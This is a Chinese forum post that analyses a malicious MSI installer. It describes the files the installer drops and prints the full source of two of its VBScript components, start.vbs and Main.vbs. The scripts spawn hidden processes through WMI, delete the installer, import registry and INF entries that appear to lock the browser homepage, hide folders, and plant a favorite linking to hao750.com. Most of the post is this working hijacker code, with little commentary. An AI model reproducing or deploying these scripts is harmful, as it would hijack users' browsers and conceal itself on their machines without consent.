很强悍的病毒,这个病毒必须要运行起来。释放脚本文件和流氓软件,
比如:文件名:5575.msi
行为:在D盘符释放AliIM.exe,AliWangWang.exe,Main.vbs,copy.inf,
MyAddreg.inf ,MyAddreg.reg sefix.exe start.vbs 等一些文件。
start.vbs 内容为:
'//父进程为svchost.exe调用exe
'=======================================================================
Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
Set objSWbemServices = objSWbemLocator.ConnectServer()
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 12
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
'========================================================================
errResult = objSWbemObject.Create("wscript.exe D:\MyDocument\Main.vbs" , Null, objConfig, processId)
'=======================================================
function killme()
'//kill msi and me
on error resume next
Dim szBuf
For Each Arg In WScript.Arguments
szBuf =szBuf & Arg & " "
Next
if len(szBuf)>=5 then
Wscript.sleep 5000
With CreateObject("Scripting.FileSystemObject")
.DeleteFile left(szBuf,len(szBuf)-1)
End With
end if
end function
'=======================================================
errResult = objSWbemObject.Create("taskkill /f /im AliIM.exe" , Null, objConfig, processId)
killme
Main.vbs内容为:
on error resume next
Dim FSO,WshShell,strDesktop,strQuick,strStartmenu,myfile,oShellLink,strStart,strAllDesk
dim objShell,objFolder,objFolderItem,strDesktopFld
dim f,files
Dim processId, errResult
Dim objSWbemLocator, objSWbemServices, objStartup, objConfig, objSWbemObject
'//获取路径
'========================================================================================
Set WshShell = WScript.CreateObject("WScript.Shell")
'//桌面All Users
strAllDesk="C:\Documents and Settings\All Users\桌面\"
'//桌面
strDesktop = WshShell.SpecialFolders("Desktop")
'//快速启动
strQuick=WshShell.ExpandEnvironmentStrings("%APPDATA%") & "\Microsoft\Internet Explorer\Quick Launch"
'//开始AllUser
strStartmenu = WshShell.SpecialFolders("AllUsersStartMenu")
'//开始admin
strStart=WshShell.SpecialFolders("Startup") & "\"
'//All User启动
strAllStart=WshShell.SpecialFolders("AllUsersStartUp") & "\"
'//收藏夹
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(6)
Set objFolderItem = objFolder.Self
strDesktopFld = objFolderItem.Path & "\"
'==========================================================================================
'//获取FSO对象
'=========================================================
Set FSO = CreateObject("scripting.filesystemobject")
'=========================================================
'//父进程为svchost.exe调用exe
'=======================================================================
Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
Set objSWbemServices = objSWbemLocator.ConnectServer()
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 12
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
'========================================================================
'//删除指定类型的快捷方式
'============================================================================================
function deletelnk(strPath)
Set f=FSO.GetFolder(strPath)
Set files=f.files
For Each file In files
if right(lcase(file.name),3)="url" then
FSO.deletefile strPath & "\" & file.name
end if
if right(lcase(file.name),3)="lnk" then
if instr(lcase(file.name),"internet")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"世界之窗")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"mozilla firefox")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"腾讯tt")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"谷歌浏览器")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"opera")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
if instr(lcase(file.name),"傲游浏览器")<>0 then
FSO.deletefile strPath & "\" & file.name
end if
end if
Next
end function
'============================================================================================
'//添加收藏夹
'==========================================================================================
function faver(a,b)
if FSO.FileExists(strDesktopFld & a & ".url")=false then
Set myfile=FSO.CreateTextFile( strDesktopFld & a & ".txt" ,,ture)
myfile.WriteLine "[InternetShortcut]"
myfile.WriteLine "URL=" & b
myfile.Close
errResult = objSWbemObject.Create("cmd.exe /c ren " & """" & strDesktopFld & a & ".txt" & """" & " " & a & ".url" , Null, objConfig, processId)
end if
End function
'==========================================================================================
'//建立自己的锁
'==========================================================================================
function locks(a,b,c)
errResult = objSWbemObject.Create("regedt32.exe /s " & b, Null, objConfig, processId)
errResult = objSWbemObject.Create("RunDll32.exe advpack.dll,LaunchINFSection " & a & ",DefaultInstall", Null, objConfig, processId)
Wscript.sleep 3000
'errResult = objSWbemObject.Create("cmd.exe /c ren " & """" & strQuick & """" & " a", Null, objConfig, processId)
'errResult = objSWbemObject.Create("cmd.exe /c copy " & """" & c & "Internet Explorer.lnk" & """" & " " & """" & replace(strQuick,"Quick Launch","a") & "\Internet Explorer.lnk" & """", Null, objConfig, processId)
'errResult = objSWbemObject.Create("cmd.exe /c ren " & """" & replace(strQuick,"Quick Launch","a") & """" & " " & """" & "Quick Launch" & """", Null, objConfig, processId)
errResult = objSWbemObject.Create("RunDll32.exe advpack.dll,LaunchINFSection " & c & "copy.inf,DefaultInstall", Null, objConfig, processId)
End function
'==========================================================================================
'//清理桌面
errResult = objSWbemObject.Create("shmgrate.exe OCInstallHideIE", Null, objConfig, processId)
Wscript.sleep 3000
'deletelnk strQuick
'deletelnk strDesktop
'deletelnk strAllDesk
'deletelnk strStartmenu
'//隐藏文件夹
errResult = objSWbemObject.Create("attrib +s +h +r +a " & """" & "D:\360SE" & """", Null, objConfig, processId)
errResult = objSWbemObject.Create("attrib +s +h +r +a " & """" & "D:\MyDocument" & """", Null, objConfig, processId)
'//添加收藏夹
'//添加收藏夹
faver "网-址-之-家","http://www.hao750.com/"
'//建立自己的锁
locks "D:\MyDocument\myaddreg.inf","D:\MyDocument\myaddreg.reg","D:\MyDocument\"
'//调用jse
if FSO.FileExists("C:\Program Files\Common Files\Windows\log.jse") then
errResult = objSWbemObject.Create("wscript.exe " & """" & "C:\Program Files\Common Files\Windows\log.jse" & """", Null, objConfig, processId)
end if
|
楼主: xuange
发表于 2010-12-2 09:56:53
